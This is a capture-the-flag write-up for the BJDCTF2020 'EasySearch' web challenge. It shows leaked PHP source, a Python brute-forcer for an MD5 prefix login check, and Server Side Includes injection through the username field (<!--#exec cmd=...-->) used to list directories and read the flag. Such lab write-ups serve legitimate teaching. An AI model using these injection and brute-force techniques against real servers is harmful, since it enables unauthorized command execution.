[BJDCTF2020]EasySearch.md


The front page looks like this (a login form).

Why do both input boxes have the placeholder "username"?!

Guessing the password got nowhere, so fast-forward to the next step.


Scanning directories with dirsearch turns up a copy of the source:

```php
<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>
```

These `***` can't be someone's shaky hand dripping ink on the 💾, can they? QwQ


First, get past the password check. The server never compares the whole hash: it only checks that the first 6 hex characters (24 bits) of `md5($_POST['password'])` equal `6d0bc1`. A 24-bit prefix is trivially brute-forceable, so just hash integers until one matches. Note that `6d0bc1` contains letters, so this is not a `0e` magic-hash / loose-comparison trick; a plain brute force is the intended route.

```python
from hashlib import md5

# Hash the decimal strings 0, 1, 2, ... until the first 6 hex
# characters of the digest match the hard-coded $admin prefix.
i = 0
while True:
    if md5(str(i).encode('utf-8')).hexdigest()[:6] == '6d0bc1':
        print(i)
        break
    i = i + 1
```

Output:

```
2020666
```


Next, the server writes a `.shtml` file with a random name into the `public/` directory, and the file's contents include the `username` we posted, unescaped.

The message `[!] Header error ...` is a hint to look at the response headers, which is where the path of the generated `.shtml` file is exposed.


Then came something new to me: shtml.

In short, a `.shtml` file is processed by the web server's Server Side Includes engine (Apache's mod_include) before it is sent, so a directive like

```html
<!--#exec cmd="ls -l" -->
```

executes a shell command on the server and splices its output into the page. This only works because the server has SSI enabled for `.shtml` files (`Options +Includes` in Apache); if the server were configured with `IncludesNOEXEC`, `exec` would be disabled and only `include`/`echo` style directives would work.

Since `username` is written verbatim into the generated file, we inject the directive through it and then fetch the `.shtml` path from the response header to run the command:

```
ls

ls ..

cat ../flag_990c66bf85a09c664f0b6741840499b2
```

#Web #PHP #HTTP #Header #RCE #SHTML #HTML #DirectoryScanning #md5